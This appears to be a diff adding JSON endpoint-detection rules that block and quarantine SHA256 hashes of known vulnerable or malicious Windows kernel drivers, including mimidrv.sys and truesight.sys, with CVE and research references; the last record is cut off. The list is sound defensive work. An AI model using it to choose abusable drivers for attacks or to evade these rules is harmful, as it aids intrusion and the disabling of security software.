+{
+ "id": "05076b32-cce0-5681-b423-97d1f96778bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468611Z",
+ "creation_date": "2026-03-23T11:45:30.468614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94f4bcc9b062406ee7468659c1710d3e0cb057c7b7194e15cd72845082138019",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "050cac9e-59ad-5881-a7b5-0a1b027ab859",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816635Z",
+ "creation_date": "2026-03-23T11:45:30.816637Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "defde359045213ae6ae278e2a92c5b4a46a74119902364c7957a38138e9c9bbd",
+ "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0512b663-3484-5dd8-9571-f68300078c85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490919Z",
+ "creation_date": "2026-03-23T11:45:31.490922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a222868df05c425df8ac6b7945405c4ed61d9f81f0789171869226d156e9ac24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05198561-b1db-5967-80b8-dc2c6b472487",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808865Z",
+ "creation_date": "2026-03-23T11:45:31.808885Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808891Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "746900af78ec0d7904d0cbb3969281cfb1d5ebedd53017cae6a27509062b8066",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05223dc4-5a8f-5cf8-9bb1-e4b41b418668",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156887Z",
+ "creation_date": "2026-03-23T11:45:31.156889Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156894Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18357003448d4db822b5eea10eefa18fd78646079ebd338a9e7ee210542b1103",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05272034-3189-51b2-a78a-1db537f5995f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150686Z",
+ "creation_date": "2026-03-23T11:45:31.150688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83830685970d9094f7605289cfd06dcf1741e233216fd7dc2e43f0d3b0c90d79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05323ac5-24e5-5052-8c24-e4de8f07eb7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160345Z",
+ "creation_date": "2026-03-23T11:45:31.160347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bed676cce59f13fe1ae3c07b1897deaba401840d822af8021790440eb9f3b7e2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0537b285-3d55-5512-afa9-b2deb2a4bfd2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146565Z",
+ "creation_date": "2026-03-23T11:45:31.146567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2946278067a6a60d88d842bfb9134731c73fb7accf734120182263cb785a4daf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "053923c3-5b72-51e5-9fbe-697e1af0393c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483064Z",
+ "creation_date": "2026-03-23T11:45:31.483068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1d12f7b06088c56e4ced1296b0d9614b1fa3042fcbb964685514dff0b297730",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "054436d8-92ca-5d17-ac0a-21b765e4cba5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613910Z",
+ "creation_date": "2026-03-23T11:45:29.613912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3fa4872fd2c286904a0cf37a392ef89fb6ba2a84fc9e1b66c70e0cb5ae28efa",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "054948f6-8d70-5ed0-9f64-0e63617990ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143183Z",
+ "creation_date": "2026-03-23T11:45:31.143185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143190Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a38dbf377d4371911959762bc856b04ef38ee54b53b5b327977ccf23fec6c5b6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "054fa1a1-6520-5ad2-bdb7-67da9220ff65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970019Z",
+ "creation_date": "2026-03-23T11:45:29.970021Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68043583bc2f3fc1ca11458e8b921dce2573afdc04bd20ba85eeb806d884eb6f",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0554a339-a44b-501b-8cdd-10413c5c5ccf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828257Z",
+ "creation_date": "2026-03-23T11:45:30.828259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d82863d3837c0074fd60fbf8ed69f082a0681d4d9945eba8488e8482c8bba31",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "055d0196-ad4c-52c1-9717-dd839c89c121",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151195Z",
+ "creation_date": "2026-03-23T11:45:31.151197Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151202Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f83e9c4122d25e9d32087c77d9391b46974b3d7090f369529ff2354d7d215b39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0569fc76-6e58-5438-afe0-d117c1069bf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609630Z",
+ "creation_date": "2026-03-23T11:45:29.609632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05815517-72b3-5d65-81bb-6bacf04e9085",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617816Z",
+ "creation_date": "2026-03-23T11:45:29.617818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617823Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "058a7d7d-4b10-5ea9-b083-f536323e74c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808969Z",
+ "creation_date": "2026-03-23T11:45:31.808971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b180e7871f6fbdc5fc8eac158a2a529b706bcf5ee60a34865574617de96c2ef5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05a40ccd-8930-52a7-bd25-aef204aa96a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476371Z",
+ "creation_date": "2026-03-23T11:45:31.476376Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95d668bd3b2131b48b8938b1083279d5c56a29214912556ca22d385d3933a32c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05a5c571-fabf-5a83-81d8-823e0d240d3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821583Z",
+ "creation_date": "2026-03-23T11:45:30.821586Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821595Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00d9781d0823ab49505ef9c877aa6fa674e19ecc8b02c39ee2728f298bc92b03",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05b26c98-7a11-5ae0-82c1-cb750152c462",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485451Z",
+ "creation_date": "2026-03-23T11:45:31.485455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e71d4c24fab2ccffcf694066bb773a7591d682be6644f555df69325cba136f3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05b2fe91-6886-550d-b2c3-ff25e8135ea3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816549Z",
+ "creation_date": "2026-03-23T11:45:31.816552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae0ea2defb5399b26e18586ec288ed28fc67b8f8d46fbf3080b6b77d3a6d33f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05b8773f-6980-531a-b1ca-2e4a589c9d2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831658Z",
+ "creation_date": "2026-03-23T11:45:30.831660Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831666Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "329393b1ef53053dc6ee1202355fda1446e4da10f0488b6107ffff4638b8a010",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "05c418e8-7a2e-5be1-ac62-b585d58a8ea2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
